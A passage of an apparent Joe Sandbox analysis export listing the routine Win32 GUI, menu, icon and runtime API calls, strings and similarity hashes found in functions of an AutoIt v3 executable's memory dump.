                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                    • String ID: @$AutoIt v3 GUI
                                                                                                                                                    • API String ID: 867697134-3359773793
                                                                                                                                                    • Opcode ID: 00a77f97e553fd72a6cbe10c1c6169f4dfcf88cf398ac727729fd0aea825547b
                                                                                                                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                                    • Opcode Fuzzy Hash: 00a77f97e553fd72a6cbe10c1c6169f4dfcf88cf398ac727729fd0aea825547b
                                                                                                                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                    • API String ID: 1503153545-1459072770
                                                                                                                                                    • Opcode ID: fdee644b799a79cc51680871cdb4e33d86fc0af8b03a6c9e9b934ea10f9254c8
                                                                                                                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                                                    • Opcode Fuzzy Hash: fdee644b799a79cc51680871cdb4e33d86fc0af8b03a6c9e9b934ea10f9254c8
                                                                                                                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                                                    • API String ID: 790654849-32604322
                                                                                                                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a303ae421967ed805ccaf407991e05be4a725e9efa943f69ad4090a8a0f3d8d3
                                                                                                                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                                                    • Opcode Fuzzy Hash: a303ae421967ed805ccaf407991e05be4a725e9efa943f69ad4090a8a0f3d8d3
                                                                                                                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2353593579-4108050209
                                                                                                                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1744303182-0
                                                                                                                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                                                    • __mtterm.LIBCMT ref: 00417C34
                                                                                                                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
• TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
• __init_pointers.LIBCMT ref: 00417CE6
• __calloc_crt.LIBCMT ref: 00417D54
• GetCurrentThreadId.KERNEL32 ref: 00417D80
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
• API String ID: 4163708885-3819984048
• Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
• Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
• Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
• Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
APIs
Strings
Similarity
• API ID: __wcsicoll$IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2485277191-404129466
• Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
• Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
• Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
• Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
APIs
• LoadIconW.USER32(?,00000063), ref: 0045464C
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
• SetWindowTextW.USER32(?,?), ref: 00454678
• GetDlgItem.USER32(?,000003EA), ref: 00454690
• SetWindowTextW.USER32(00000000,?), ref: 00454697
• GetDlgItem.USER32(?,000003E9), ref: 004546A8
• SetWindowTextW.USER32(00000000,?), ref: 004546AF
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
• GetWindowRect.USER32(?,?), ref: 004546F5
• SetWindowTextW.USER32(?,?), ref: 00454765
• GetDesktopWindow.USER32 ref: 0045476F
• GetWindowRect.USER32(00000000), ref: 00454776
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
• GetClientRect.USER32(?,?), ref: 004547D2
• PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
• SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
• Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
• Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
• Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
APIs
• _wcslen.LIBCMT ref: 00464B28
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
• _wcslen.LIBCMT ref: 00464C28
• GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
• _wcslen.LIBCMT ref: 00464CBA
• _wcslen.LIBCMT ref: 00464CD0
• _wcslen.LIBCMT ref: 00464CEF
Strings
Similarity
• API ID: _wcslen$Directory$CurrentSystem
• String ID: D
• API String ID: 1914653954-2746444292
• Opcode ID: ed9d0a7f9b7fb7092718205c5f8494621a67a2dc2e8c2e1649d5905c8fe18f22
• Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
• Opcode Fuzzy Hash: ed9d0a7f9b7fb7092718205c5f8494621a67a2dc2e8c2e1649d5905c8fe18f22
• Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
APIs
Strings
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
• Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
• Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
• GetFocus.USER32 ref: 0046A0DD
• GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
Strings
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
• API String ID: 1534620443-4108050209
• Opcode ID: 7c6c4d24ceb8cecb3d8bafd3d66fcf6c17dfe0bcf56ceba48e1820ad1c1361f1
• Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
• Opcode Fuzzy Hash: 7c6c4d24ceb8cecb3d8bafd3d66fcf6c17dfe0bcf56ceba48e1820ad1c1361f1
• Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateDestroy
                                                                                                                                                    • String ID: ,$tooltips_class32
                                                                                                                                                    • API String ID: 1109047481-3856767331
                                                                                                                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1441871840-4108050209
                                                                                                                                                    • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                                                    • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                                                                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                     • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                    • API String ID: 3631882475-2268648507
                                                                                                                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                                    APIs
                                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
